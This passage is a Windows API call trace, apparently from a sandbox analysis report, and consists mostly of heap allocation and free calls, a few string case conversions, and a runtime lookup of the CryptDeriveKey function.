(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0268.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0268.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0268.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0268.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0268.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0268.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0268.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0268.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0268.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0268.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0268.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0268.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0268.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0268.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0268.494] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0268.494] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0268.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0268.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0268.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0268.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0268.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0268.494] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0268.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0268.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0268.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa00 [0268.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0268.494] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0268.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0268.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0268.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0268.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0268.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0268.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0268.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0268.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0268.495] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0268.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0268.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0268.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0268.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0268.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0268.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0268.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0268.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0268.496] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0268.496] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0268.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0268.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0268.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0268.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0268.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0268.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0268.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0268.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0268.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0268.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0268.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0268.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0268.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0268.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0268.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0268.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0268.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0268.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0268.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0268.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0268.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0268.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0268.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0268.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0268.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0268.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0268.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0268.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0268.498] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0268.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0268.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0268.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa340 [0268.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0268.498] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0268.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0268.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0268.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0268.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0268.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0268.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0268.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0268.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0268.498] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0268.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0268.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0268.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0268.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0268.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0268.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0268.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0268.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0268.499] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0268.499] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0268.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0268.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0268.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0268.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0268.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0268.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0268.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0268.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0268.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0268.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0268.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0268.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0268.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0268.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0268.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0268.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0268.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0268.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0268.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0268.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0268.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0268.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0268.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0268.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0268.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0268.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0268.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0268.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0268.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0268.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0268.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0268.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0268.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0268.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0268.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0268.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0268.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0268.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0268.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0268.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0268.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0268.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0268.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0268.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0268.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0268.502] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0268.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0268.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0268.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0268.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0268.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0268.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0268.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0268.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0268.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0268.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0268.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0268.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0268.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0268.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0268.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0268.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0268.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0268.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0268.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0268.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0268.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0268.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0268.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0268.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0268.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0268.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0268.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0268.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0268.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0268.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0268.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0268.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0268.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0268.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0268.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0268.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0268.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0268.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0268.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0268.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0268.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0268.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0268.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0268.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0268.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0268.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0268.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0268.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0268.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0268.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0268.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0268.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0268.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0268.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0268.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0268.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0268.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0268.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf) returned 0x34aa838 [0268.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x34aa838, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0268.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0268.507] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0268.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0268.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0268.507] 